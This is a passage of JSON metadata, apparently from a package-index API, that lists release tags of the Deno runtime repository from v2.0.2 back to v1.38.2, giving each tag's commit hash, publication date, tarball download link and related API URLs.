,"download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.co